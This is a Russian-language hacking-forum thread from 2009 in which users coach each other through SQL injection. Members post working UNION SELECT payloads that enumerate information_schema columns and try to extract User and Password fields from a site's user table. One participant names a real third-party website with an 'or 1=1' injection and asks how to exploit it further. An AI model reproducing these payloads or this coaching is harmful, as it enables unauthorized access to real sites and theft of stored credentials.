Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
23.01.2009, 19:58
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Пробуй в ручную подобрать таблицы.
|
|
|
23.01.2009, 20:07
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
Сообщение от R1dex
Пробуй в ручную подобрать таблицы.
Например? Я просто не так часто встречаюсь с MD...
в обычной скуле можно попробовать mysqlusers, users, admin и т.д. А тут что посоветйте прописать?
|
|
|
|
23.01.2009, 20:11
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Насколько я понимаю, это Microsoft Access?
Тогда у тебя тот запрос вообще не правильно построен..
Вначале определяешь кол-во столбцов, с помощью order+by
Потом union+select+1,2,3...+from+таблица
Синтаксис запроса всегда должен содержать from+таблица, иначе вывода не увидешь.
|
|
|
|
23.01.2009, 20:16
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
Сообщение от R1dex
Насколько я понимаю, это Microsoft Access?
Тогда у тебя тот запрос вообще не правильно построен..
Вначале определяешь кол-во столбцов, с помощью order+by
Потом union+select+1,2,3...+from+таблица
Синтаксис запроса всегда должен содержать from+таблица, иначе вывода не увидешь.
Не прет, насколько я помню Microsoft Access не понимает order by, или я ошибаюсь?
короче
http://www.aes.kz/site/news_sobyt_pod.asp?lng=1+or+1=1
направьте меня дальше, пригодится опыт с Microsoft Access.
|
|
|
|
23.01.2009, 20:55
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889
Репутация:
60
|
|
опять Я)
http://localhost/view_cat.php?cat=-1+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.COLUMNS+where+table_name=0x757365 72+limit+1,2
или как тут мне подсказал BloodyMessage
http://localhost/view_cat.php?cat=-1+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.COLUMNS+where+TABLE_NAME=CHAR(117 ,115,101,114)+limit+1,2
данные запросы показали,что в базе в таблице user сущестуют столбцы User & Password
Пытаюсь выводить их следующим запросом:
http://localhost/view_cat.php?cat=-1+union+select+1,2,User,Password,5,6,7,8,9+from+us er+limit+1,1
Но,к сожалению,у меня ничего не выходит!Посоветуйте что-нибудь!  |
|
|
|
23.01.2009, 20:59
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
kevmen
https://forum.antichat.ru/showpost.php?p=1051237&postcount=4597
Попробуй почитать это, возможно многие вопросы отпадут
|
|
|
|
23.01.2009, 20:59
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Gemini12
Ещё как понимает order+by, однако, по моему мнению - тут инъекцию не провести, хотя, может кто-нибудь и оспорит )
kevmen
Посмотри в какой бд лежит таблица.
Возможно там просто нету записей?
Последний раз редактировалось R1dex; 23.01.2009 в 21:10..
|
|
|
|
23.01.2009, 21:01
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889
Репутация:
60
|
|
jokester,спасибо,но хотелось бы выяснить:на данный момент запрос составлен верно?
|
|
|
|
23.01.2009, 21:05
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
2 kevmen
может в табле всего 1 запись?
попробуй вот так...
http://localhost/view_cat.php?cat=-1+union+select+1,2,User,Password,5,6,7,8,9+from+us er+limit+0,1
|
|
|
|
23.01.2009, 21:07
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889
Репутация:
60
|
|
Iceangel_,в таблице записей нет)вообще)
А запрос верно составлен?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
